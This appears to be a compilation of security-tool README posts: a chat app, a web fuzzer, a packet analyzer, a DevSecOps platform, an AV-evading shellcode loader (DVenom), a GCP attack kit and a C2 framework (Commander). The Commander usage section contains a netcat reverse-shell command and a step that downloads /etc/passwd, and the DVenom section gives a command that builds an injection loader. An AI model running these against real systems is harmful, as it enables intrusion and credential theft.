    CryptoChat - Beyond Secure Messaging

    By: Zion3R


    Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!

    1. End-to-End Encryption: Every message is secured from sender to receiver, ensuring utmost privacy.
    2. User-Friendly Interface: Navigating and messaging is intuitive and simple, making secure conversations a breeze.
    3. Robust Backend: Built on the powerful Python ecosystem, our chat is reliable and fast.
    4. Open Source: Dive into our codebase, contribute, and make it even better for everyone.
    5. Multimedia Support: Not just text - send encrypted images, videos, and files with ease.
    6. Group Chats: Have encrypted conversations with multiple people at once.

    • Python 3.x
    • cryptography
    • colorama

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/CryptoChat.git
    2. Navigate to the project directory:

      cd CryptoChat
    3. Install the required dependencies:

      pip install -r requirements.txt

    $ python3 server.py --help
    usage: server.py [-h] [--host HOST] [--port PORT]

    Start the chat server.

    options:
    -h, --help show this help message and exit
    --host HOST The IP address to bind the server to.
    --port PORT The port number to bind the server to.
    --------------------------------------------------------------------------
    $ python3 client.py --help
    usage: client.py [-h] [--host HOST] [--port PORT]

    Connect to the chat server.

    options:
    -h, --help show this help message and exit
    --host HOST The server's IP address.
    --port PORT The port number of the server.

    $ python3 serverE.py --help
    usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]

    Start the chat server.

    options:
    -h, --help show this help message and exit
    --host HOST The IP address to bind the server to. (Default=0.0.0.0)
    --port PORT The port number to bind the server to. (Default=12345)
    --key KEY The secret key for encryption. (Default=mysecretpassword)
    --------------------------------------------------------------------------
    $ python3 clientE.py --help
    usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]

    Connect to the chat server.

    options:
    -h, --help show this help message and exit
    --host HOST The IP address to bind the server to. (Default=127.0.0.1)
    --port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
    • --help: show this help message and exit
    • --host: The IP address to bind the server.
    • --port: The port number to bind the server.
    • --key : The secret key for encryption

    Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

    If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:



    Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

    By: Zion3R

    Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

    Afuzz is being actively developed by @rapiddns


    Features

    • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
    • Uses blacklist to filter invalid pages
    • Uses whitelist to find content that bug bounty hunters are interested in in the page
    • filters random content in the page
    • judges 404 error pages in multiple ways
    • perform statistical analysis on the results after scanning to obtain the final result.
    • support HTTP2

    Installation

    git clone https://github.com/rapiddns/Afuzz.git
    cd Afuzz
    python setup.py install

    OR

    pip install afuzz

    Run

    afuzz -u http://testphp.vulnweb.com -t 30

    Result

    Table

    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | http://testphp.vulnweb.com/ |
    +-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
    | target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
    | http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
    | http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
    | http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
    | http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
    | http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
    | http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
    | http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
    | http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
    | http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | product.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
    | http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
    | http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+

    Json

    {
    "result": [
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/workspace.xml",
    "status": 200,
    "redirect": "",
    "title": "",
    "length": 12437,
    "content_type": "text/xml",
    "lines": 217,
    "words": 774,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/workspace.xml"
    },
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
    "type": "folder",
    "mark": "30x",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/admin"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "login.php",
    "status": 200,
    "redirect": "",
    "title": "login page",
    "length": 5009,
    "content_type": "text/html",
    "lines": 120,
    "words": 432,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/login.php"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/.name",
    "status": 200,
    "redirect": "",
    "title": "",
    "length": 6,
    "content_type": "application/octet-stream",
    "lines": 1,
    "words": 1,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/.name"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/vcs.xml",
    "status": 200,
    "redirect": "",
    "title": "",
    "length": 173,
    "content_type": "text/xml",
    "lines": 8,
    "words": 13,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/vcs.xml"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/",
    "status": 200,
    "redirect": "",
    "title": "Index of /.idea/",
    "length": 937,
    "content_type": "text/html",
    "lines": 14,
    "words": 46,
    "type": "whitelist",
    "mark": "index of",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "cgi-bin/",
    "status": 403,
    "redirect": "",
    "title": "403 Forbidden",
    "length": 276,
    "content_type": "text/html",
    "lines": 10,
    "words": 28,
    "type": "folder",
    "mark": "403",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/cgi-bin/"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/encodings.xml",
    "status": 200,
    "redirect": "",
    "title": "",
    "length": 171,
    "content_type": "text/xml",
    "lines": 6,
    "words": 11,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/encodings.xml"
    },
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/search.php"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "product.php",
    "status": 200,
    "redirect": "",
    "title": "picture details",
    "length": 4576,
    "content_type": "text/html",
    "lines": 111,
    "words": 377,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/product.php"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "admin/",
    "status": 200,
    "redirect": "",
    "title": "Index of /admin/",
    "length": 248,
    "content_type": "text/html",
    "lines": 8,
    "words": 16,
    "type": "whitelist",
    "mark": "index of",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/admin/"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea",
    "status": 301,
    "redirect": "http://testphp.vulnweb.com/.idea/",
    "title": "301 Moved Permanently",
    "length": 169,
    "content_type": "text/html",
    "lines": 8,
    "words": 11,
    "type": "folder",
    "mark": "30x",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea"
    }
],
"total": 12,
"target": "http://testphp.vulnweb.com/"
    }

    Wordlists (IMPORTANT)

    Summary:

    • Wordlist is a text file, each line is a path.
    • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
    • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

    Examples:

    • Normal extensions
    index.%EXT%

    Passing asp and aspx extensions will generate the following dictionary:

    index
    index.asp
    index.aspx
    • host
    %subdomain%.%ext%
    %sub%.bak
    %domain%.zip
    %rootdomain%.zip

Passing https://test-www.hackerone.com and the php extension will generate the following dictionary:

    test-www.hackerone.com.php
    test-www.zip
    test.zip
    www.zip
    testwww.zip
    hackerone.zip
    hackerone.com.zip
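A minimal sketch of the %EXT% expansion described above (illustrative only; Afuzz's real implementation lives in its own codebase):

# Minimal sketch of %EXT% substitution (illustrative only).
def expand_wordlist(lines, extensions):
    results = []
    for line in lines:
        if "%EXT%" in line:
            # The bare path (without extension) is kept as well.
            results.append(line.replace(".%EXT%", ""))
            for ext in extensions:
                results.append(line.replace("%EXT%", ext))
        else:
            results.append(line)
    return results

print(expand_wordlist(["index.%EXT%", "admin"], ["asp", "aspx"]))
# ['index', 'index.asp', 'index.aspx', 'admin']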

    Options




    usage: afuzz [options]

    An Automated Web Path Fuzzing Tool.
    By RapidDNS (https://rapiddns.io)

    options:
    -h, --help show this help message and exit
    -u URL, --url URL Target URL
    -o OUTPUT, --output OUTPUT
    Output file
    -e EXTENSIONS, --extensions EXTENSIONS
    Extension list separated by commas (Example: php,aspx,jsp)
    -t THREAD, --thread THREAD
    Number of threads
    -d DEPTH, --depth DEPTH
    Maximum recursion depth
    -w WORDLIST, --wordlist WORDLIST
    wordlist
    -f, --fullpath fullpath
    -p PROXY, --proxy PROXY
    proxy, (ex:http://127.0.0.1:8080)

    How to use

Some examples of how to use Afuzz; these are the most common arguments. If you need them all, just use the -h argument.

    Simple usage

    afuzz -u https://target
    afuzz -e php,html,js,json -u https://target
    afuzz -e php,html,js -u https://target -d 3

    Threads

The thread number (-t | --threads) sets the number of separate brute-force workers, so the bigger the thread count, the faster Afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up progress.

That said, the speed still depends a lot on the response time of the server. As a warning, we advise you not to set the thread count too high, because it can cause a DoS.

    afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

    Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can be used to filter out some pages.

The blacklist.txt file is the same as dirsearch's.

The bad_string.txt file is a text file with one rule per line. The format is position==content, with == as the separator; position can be one of: header, body, regex, title.

    Language detection

The language.txt file contains the language-detection rules; its format is the same as bad_string.txt. It is used to detect the development language a website uses.

    References

    Thanks to open source projects for inspiration

    • Dirsearch by by Shubham Sharma
    • wfuzz by Xavi Mendez
    • arjun by Somdev Sangwan


    Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

    By: Zion3R


    Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.

    • Capable of bypassing some well-known antivirus (AVs).
    • Offers multiple encryption methods including RC4, AES256, XOR, and ROT.
    • Produces source code in C#, Rust, PowerShell, ASPX, and VBA.
    • Employs different shellcode loading techniques: VirtualAlloc, Process Injection, NT Section Injection, Hollow Process Injection.

    These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

    • Golang installed.
    • Basic understanding of shellcode operations.
    • Familiarity with C#, Rust, PowerShell, ASPX, or VBA.

    To clone and run this application, you'll need Git installed on your computer. From your command line:

    # Clone this repository
    $ git clone https://github.com/zerx0r/dvenom
    # Go into the repository
    $ cd dvenom
    # Build the application
$ go build ./cmd/dvenom/

    After installation, you can run the tool using the following command:

    ./dvenom -h

    • -e: Specify the encryption type for the shellcode (Supported types: xor, rot, aes256, rc4).
    • -key: Provide the encryption key.
    • -l: Specify the language (Supported languages: cs, rs, ps1, aspx, vba).
    • -m: Specify the method type (Supported types: valloc, pinject, hollow, ntinject).
    • -procname: Provide the process name to be injected (default is "explorer").
    • -scfile: Provide the path to the shellcode file.

To generate C# source code that contains encrypted shellcode:

    Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.

    ./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs
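For illustration, the simplest of DVenom's encryption modes, XOR, is easy to sketch (Python purely for illustration; DVenom itself is written in Go and its loaders differ):

# Minimal sketch of XOR-wrapping a shellcode blob (illustrative only).
def xor_encrypt(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

with open("shellcode.bin", "rb") as f:  # placeholder input file
    shellcode = f.read()

encrypted = xor_encrypt(shellcode, b"secretKey")
# XOR is symmetric: applying the same key again restores the original.
assert xor_encrypt(encrypted, b"secretKey") == shellcode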

Language   | Supported Methods                 | Supported Encryption
C#         | valloc, pinject, hollow, ntinject | xor, rot, aes256, rc4
Rust       | pinject, hollow, ntinject         | xor, rot, rc4
PowerShell | valloc, pinject                   | xor, rot
ASPX       | valloc                            | xor, rot
VBA        | valloc                            | xor, rot

    Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

    This project is licensed under the MIT License - see the LICENSE file for details.

    Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.



    TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

    By: Zion3R


    TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.
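A minimal sketch of this kind of PCAP processing with scapy (illustrative only, not TrafficWatch's actual code; capture.pcap is a placeholder file name):

# Minimal sketch of PCAP analysis with scapy (illustrative only).
from scapy.all import rdpcap, TCP, UDP

packets = rdpcap("capture.pcap")  # placeholder file name
counts = {"TCP": 0, "UDP": 0, "other": 0}
for pkt in packets:
    if pkt.haslayer(TCP):
        counts["TCP"] += 1
    elif pkt.haslayer(UDP):
        counts["UDP"] += 1
    else:
        counts["other"] += 1
print(counts)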

    • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
    • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
    • Summary statistics on captured packets.
    • Interactive mode for in-depth packet inspection.
    • Timestamps for each captured packet.
    • User-friendly colored output for improved readability.
    • Python 3.x
    • scapy
    • argparse
    • pyshark
    • colorama

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/TrafficWatch.git
    2. Navigate to the project directory:

      cd TrafficWatch
    3. Install the required dependencies:

      pip install -r requirements.txt

    python3 trafficwatch.py --help
    usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

    Packet Sniffer Tool

    options:
    -h, --help show this help message and exit
    -f FILE, --file FILE Path to the .pcap file to analyze
    -p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
    Filter by specific protocol
    -c COUNT, --count COUNT
    Number of packets to display

    To analyze packets from a PCAP file, use the following command:

    python trafficwatch.py -f path/to/your.pcap

    To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

    python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

    • -f or --file: Path to the PCAP file for analysis.
    • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
    • -c or --count: Limit the number of displayed packets.

    Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about TrafficWatch, please feel free to contact me:

    This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!



    GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

    By: Zion3R


GATOR, the GCP Attack Toolkit for Offensive Research, is a tool designed to aid in researching and exploiting Google Cloud environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


    Modules

β€’ User Authentication (module: auth)
  β€’ activate: Activate a Specific Authentication Method
  β€’ add: Add a New Authentication Method
  β€’ delete: Remove a Specific Authentication Method
  β€’ list: List All Available Authentication Methods
β€’ Cloud Functions (module: functions)
  β€’ list: List All Deployed Cloud Functions
  β€’ permissions: Display Permissions for a Specific Cloud Function
  β€’ triggers: List All Triggers for a Specific Cloud Function
β€’ Cloud Storage (module: storage, command group: buckets)
  β€’ list: List All Storage Buckets
  β€’ permissions: Display Permissions for Storage Buckets
β€’ Compute Engine (module: compute, command group: instances)
  β€’ add-ssh-key: Add SSH Key to Compute Instances

    Installation

    Python 3.11 or newer should be installed. You can verify your Python version with the following command:

    python --version

    Manual Installation via setup.py

    git clone https://github.com/anrbn/GATOR.git
    cd GATOR
    python setup.py install

    Automated Installation via pip

    pip install gator-red

    Documentation

Have a look at the GATOR Documentation for a guided explanation of using GATOR and its modules!

    Issues

    Reporting an Issue

    If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

    1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

    2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

    3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

    4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

    Your feedback is important, and will help improve the tool. I appreciate your contribution!

    Resolving an Issue

I'll review reported issues on a regular basis, try to reproduce them based on your description, and follow up with you for further information if necessary. Once I understand the issue, I'll work on a fix.

    Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

    Contributing

    I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

    Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

    Thank you for considering contributing to the project.

    Questions and Issues

    If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



    SecuSphere - Efficient DevSecOps

    By: Zion3R


    SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


    Centralized Vulnerability Management

    At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

    Seamless CI/CD Pipeline Integration

    SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

    Comprehensive Security Assessment

    SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

    Cultivating DevSecOps Practices

    SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

    Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

     Features

    • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
    • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
    • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
    • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

    Dashboard and Reporting

    SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

    API and Web Console

    SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

    For more information please refer to our Official Rest API Documentation

    Integration with Ticketing Systems

    SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

    Security Training and Awareness

    SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

    User Guide

    Get started with SecuSphere using our comprehensive user guide.

Installation

    You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

    Clone the Repository

    $ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

    Setup

    Local Setup

    Navigate to the source directory and run the Python file:

    $ cd src/
    $ python run.py

    Dockerfile Setup

    Build and run the Dockerfile in the cicd directory:

    $ # From repository root
    $ docker build -t secusphere:latest .
    $ docker run secusphere:latest

    Docker Compose

    Use Docker Compose in the ci_cd/iac/ directory:

    $ cd ci_cd/iac/
    $ docker-compose -f secusphere.yml up

    Pull from Docker Hub

    Pull the latest version of SecuSphere from Docker Hub and run it:

    $ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d securityuniversal/secusphere:latest

    Feedback and Support

    We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

    Contributing

    We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



    Commander - A Command And Control (C2) Server

    By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

    Under Continuous Development

    Not script-kiddie friendly


    Features

    • Fully encrypted communication (TLS)
    • Multiple Agents
    • Obfuscation
    • Interactive Sessions
    • Scalable
    • Base64 data encoding
    • RESTful API

    Agents

    • Python 3
      • The python agent supports:
        • sessions, an interactive shell between the admin and the agent (like ssh)
        • obfuscation
        • Both Windows and Linux systems
        • download/upload files functionality
    • C
      • The C agent supports only the basic functionality for now, the control of tasks for the agents
      • Only for Linux systems

    Requirements

Python >= 3.6 is required, along with the following dependencies.

Linux is required for admin.py and c2_server.py (untested on Windows).
    apt install libcurl4-openssl-dev libb64-dev
    apt install openssl
    pip3 install -r requirements.txt

    How to Use it

    First create the required certs and keys

    # if you want to secure your key with a passphrase exclude the -nodes
    openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

    Start the admin.py module first in order to create a local sqlite db file

    python3 admin.py

    Continue by running the server

    python3 c2_server.py

And finally the agent. The Python agent can be run directly, but the C agent needs to be compiled first.

    # python agent
    python3 agent.py

    # C agent
    gcc agent.c -o agent -lcurl -lb64
    ./agent

By default both the agents and the server run over TLS and base64. The communication point is set to 127.0.0.1:5000, and if a different endpoint is needed it should be changed in the agents' source files.
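
The exact variable names live in the agent sources; as an illustration only (the names below are hypothetical, check Agents/agent.py and agent.c for the real constants), the change amounts to something like:

# hypothetical names -- check the agent source for the real constants
C2_HOST = "192.168.1.10"
C2_PORT = 5000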

    As the Operator/Administrator you can use the following commands to control your agents

    Commands:

    task add arg c2-commands
    Add a task to an agent, to a group or on all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
    c2-register: Triggers the agent to register again.
c2-shell cmd: It takes a shell command for the agent to execute, e.g. c2-shell whoami
    cmd: The command to execute.
    c2-sleep: Configure the interval that an agent will check for tasks.
    c2-session port: Instructs the agent to open a shell session with the server to this port.
    port: The port to connect to. If it is not provided it defaults to 5555.
    c2-quit: Forces an agent to quit.

    task delete arg
    Delete a task from an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show agent arg
Displays info for all the available agents or for a specific agent.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show task arg
    Displays the task of an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show result arg
    Displays the history/result of an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    find active agents
    Drops the database so that the active agents will be registered again.

    exit
    Bye Bye!


    Sessions:

    sessions server arg [port]
    Controls a session handler.
arg: can have the following values: 'start', 'stop', 'status'
    port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
    sessions select arg
    Select in which session to attach.
    arg: the index from the 'sessions list' result
    sessions close arg
    Close a session.
    arg: the index from the 'sessions list' result
    sessions list
Displays the available sessions
local-ls directory
Lists the files of the selected directory on your host
download 'file'
Downloads the 'file' locally into the current directory
upload 'file'
Uploads a file into the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what I believe :P

The idea behind this functionality is that the c2 server can ask an agent to re-register in case it doesn't recognize it. So, since we want to clear the db of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-registration mechanism of the c2 server. See below for the re-registration mechanism.

    Flows

    Below you can find a normal flow diagram

    Normal Flow

In case the environment experiences a major failure, like a corrupted database or some other critical failure, the re-registration mechanism kicks in so we don't lose the connection with our agents.

More specifically, if we lose the database we will not have any information about the uuids that we are receiving, thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks, and since we don't recognize them we will ask them to register again, so we can insert them into our database and control them again.

    Below is the flow diagram for this case.

    Re-register Flow

    Useful examples

To set up your environment, start the admin.py first, then the c2_server.py, and run the agent. Afterwards you can check the available agents.

# show all available agents
    show agent all

    To instruct all the agents to run the command "id" you can do it like this:

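# instruct all agents to execute the "id" shell command
# (follows the documented 'task add arg c2-commands' syntax above)
task add all c2-shell id
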
To check the history/previous results of executed tasks for a specific agent, do it like this:

    # check the results of a specific agent
    show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval at which the agents check for tasks, e.g. to 30 seconds, like this:

    # to set it for all agents
    task add all c2-sleep 30

    To open a session with one or more of your agents do the following.

    # find the agent/uuid
    show agent all

    # enable the server to accept connections
    sessions server start 5555

# add a task for a session to your preferred agent
task add your_preferred_agent_uuid_here c2-session 5555

    # display a list of available connections
    sessions list

# select to attach to one of the sessions, let's select 0
    sessions select 0

    # run a command
    id

    # download the passwd file locally
    download /etc/passwd

    # list your files locally to check that passwd was created
    local-ls

    # upload a file (test.txt) in the directory where the agent is
    upload test.txt

    # return to the main cli
    go back

    # check if the server is running
    sessions server status

    # stop the sessions server
    sessions server stop

If for some reason you want to run another external session, like with netcat or metasploit, do the following.

# show all available agents
    show agent all

    # first open a netcat on your machine
    nc -vnlp 4444

    # add a task to open a reverse shell for a specific agent
    task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that, even if you get disconnected, will come back up immediately. Only the interactive commands will make it die permanently.

    Obfuscation

The Python agent offers obfuscation using basic AES-ECB encryption and base64 encoding.

